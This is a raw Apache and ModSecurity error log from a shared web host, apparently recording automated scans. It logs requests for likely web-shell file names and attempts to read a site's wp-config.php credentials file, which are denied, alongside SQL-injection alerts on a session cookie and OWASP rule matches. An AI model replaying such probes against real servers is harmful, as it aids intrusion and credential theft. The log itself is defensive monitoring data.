[Tue May 12 03:38:28.199920 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ws83.php
[Tue May 12 03:38:28.523235 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/bthil.php
[Tue May 12 03:38:28.730103 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/mh.php
[Tue May 12 03:38:28.934911 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/fs.php
[Tue May 12 03:38:29.139725 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/albin.php
[Tue May 12 03:38:29.372333 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/file.php
[Tue May 12 03:38:29.576184 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ws80.php
[Tue May 12 03:38:29.779093 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/bgymj.php
[Tue May 12 03:38:29.981964 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wper.php
[Tue May 12 03:38:30.188105 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wtiiy.php
[Tue May 12 03:38:30.396678 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/xwx1.php
[Tue May 12 03:38:30.613127 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/a4.php
[Tue May 12 03:38:30.828008 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wp-blog.php
[Tue May 12 03:38:31.140801 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ws85.php
[Tue May 12 03:38:31.343811 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ws88.php
[Tue May 12 03:38:31.548891 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wp-blogs.php
[Tue May 12 03:38:31.851197 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ws78.php
[Tue May 12 03:38:31.983469 2026] [security2:error] [pid 1730207:tid 1730233] [client 5.181.131.240:42679] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKElzue9Sp-pIv_Bb6ezgAAAVg"], referer: https://www.piregwan-genesis.com/
[Tue May 12 03:38:45.060561 2026] [security2:error] [pid 1730175:tid 1730185] [client 43.134.71.232:48774] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/rendez-vous-ce-soir/"] [unique_id "agKEpXo6NvB9WXx5V-6JgQAAAQg"]
[Tue May 12 03:38:45.839791 2026] [access_compat:error] [pid 1695975:tid 1695994] [client 85.203.21.112:54679] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-config.php
[Tue May 12 03:38:46.744627 2026] [access_compat:error] [pid 1709071:tid 1709109] [client 85.203.21.137:22555] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-config.php, referer: http://dev.tct-telecom.fr/wp-config.php
[Tue May 12 03:38:49.113743 2026] [security2:error] [pid 1707624:tid 1707702] [client 43.164.131.148:38544] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/la-restauration/embed/"] [unique_id "agKEqbOxS7i6i_mT2NLXuwAAAFQ"]
[Tue May 12 03:38:53.364849 2026] [security2:error] [pid 1730207:tid 1730229] [client 49.51.52.250:42894] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/Pour-un-cirque-extrait-2.mp3"] [unique_id "agKErTue9Sp-pIv_Bb6e3QAAAVQ"]
[Tue May 12 03:38:54.670097 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/private"] [unique_id "agKErno6NvB9WXx5V-6JpAAAARc"]
[Tue May 12 03:38:54.670326 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/private"] [unique_id "agKErno6NvB9WXx5V-6JpAAAARc"]
[Tue May 12 03:38:55.827209 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKErno6NvB9WXx5V-6JpAAAARc"]
[Tue May 12 03:38:56.292777 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/project"] [unique_id "agKEsHo6NvB9WXx5V-6JrAAAARc"]
[Tue May 12 03:38:56.292964 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/project"] [unique_id "agKEsHo6NvB9WXx5V-6JrAAAARc"]
[Tue May 12 03:38:56.889386 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEsHo6NvB9WXx5V-6JrAAAARc"]
[Tue May 12 03:38:58.813351 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/projects"] [unique_id "agKEsno6NvB9WXx5V-6JtQAAARc"]
[Tue May 12 03:38:58.813538 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/projects"] [unique_id "agKEsno6NvB9WXx5V-6JtQAAARc"]
[Tue May 12 03:38:59.423573 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEsno6NvB9WXx5V-6JtQAAARc"]
[Tue May 12 03:38:59.978386 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/resources"] [unique_id "agKEs3o6NvB9WXx5V-6JugAAARc"]
[Tue May 12 03:38:59.978585 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/resources"] [unique_id "agKEs3o6NvB9WXx5V-6JugAAARc"]
[Tue May 12 03:39:00.556039 2026] [security2:error] [pid 1730175:tid 1730200] [client 172.104.186.23:46124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEs3o6NvB9WXx5V-6JugAAARc"]
[Tue May 12 03:39:14.051514 2026] [security2:error] [pid 1730175:tid 1730194] [client 172.104.186.23:40484] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/install.php"] [unique_id "agKEwno6NvB9WXx5V-6J6QAAARE"]
[Tue May 12 03:39:14.051725 2026] [security2:error] [pid 1730175:tid 1730194] [client 172.104.186.23:40484] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/install.php"] [unique_id "agKEwno6NvB9WXx5V-6J6QAAARE"]
[Tue May 12 03:39:14.640800 2026] [security2:error] [pid 1730175:tid 1730194] [client 172.104.186.23:40484] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEwno6NvB9WXx5V-6J6QAAARE"]
[Tue May 12 03:39:21.576297 2026] [autoindex:error] [pid 1695975:tid 1695994] [client 85.203.21.112:54679] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/button/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:39:22.546376 2026] [autoindex:error] [pid 1709071:tid 1709109] [client 85.203.21.137:22555] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/button/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/button/
[Tue May 12 03:39:23.718337 2026] [security2:error] [pid 1730175:tid 1730198] [client 172.104.186.23:49224] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wordpress"] [unique_id "agKEy3o6NvB9WXx5V-6J9QAAARU"]
[Tue May 12 03:39:23.718542 2026] [security2:error] [pid 1730175:tid 1730198] [client 172.104.186.23:49224] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wordpress"] [unique_id "agKEy3o6NvB9WXx5V-6J9QAAARU"]
[Tue May 12 03:39:23.722019 2026] [security2:error] [pid 1730175:tid 1730198] [client 172.104.186.23:49224] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKEy3o6NvB9WXx5V-6J9QAAARU"]
[Tue May 12 03:39:23.827913 2026] [autoindex:error] [pid 1695975:tid 1695994] [client 85.203.21.112:54679] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/media-text/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:39:24.101811 2026] [security2:error] [pid 1730207:tid 1730218] [client 43.159.46.41:43194] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agKEzDue9Sp-pIv_Bb6e7wAAAUk"], referer: http://krakoukas.com
[Tue May 12 03:39:24.743242 2026] [autoindex:error] [pid 1709071:tid 1709109] [client 85.203.21.137:22555] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/media-text/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/media-text/
[Tue May 12 03:39:26.035704 2026] [autoindex:error] [pid 1695975:tid 1695994] [client 85.203.21.112:54679] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/missing/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:39:26.938978 2026] [autoindex:error] [pid 1709071:tid 1709109] [client 85.203.21.137:22555] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/missing/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/missing/
[Tue May 12 03:39:32.651401 2026] [autoindex:error] [pid 1695975:tid 1695994] [client 85.203.21.112:54679] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/gallery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:39:33.529501 2026] [autoindex:error] [pid 1709071:tid 1709109] [client 85.203.21.137:22555] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/gallery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/gallery/
[Tue May 12 03:39:34.106065 2026] [security2:error] [pid 1709071:tid 1709111] [client 101.32.15.141:58390] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.fr"] [uri "/"] [unique_id "agKE1rvMumyrWMfSu7q4vAAAANg"]
[Tue May 12 03:39:36.476698 2026] [authz_core:error] [pid 1709071:tid 1709093] [client 47.128.125.78:44602] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-bindings/error_log
[Tue May 12 03:39:45.204614 2026] [security2:error] [pid 1695975:tid 1695993] [client 172.104.186.23:48362] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKE4dVI9ymHBxup74-aUwAAAI8"]
[Tue May 12 03:39:45.204829 2026] [security2:error] [pid 1695975:tid 1695993] [client 172.104.186.23:48362] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKE4dVI9ymHBxup74-aUwAAAI8"]
[Tue May 12 03:39:45.807431 2026] [security2:error] [pid 1695975:tid 1695993] [client 172.104.186.23:48362] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKE4dVI9ymHBxup74-aUwAAAI8"]
[Tue May 12 03:39:48.706485 2026] [autoindex:error] [pid 1695975:tid 1695994] [client 85.203.21.112:54679] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/preformatted/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
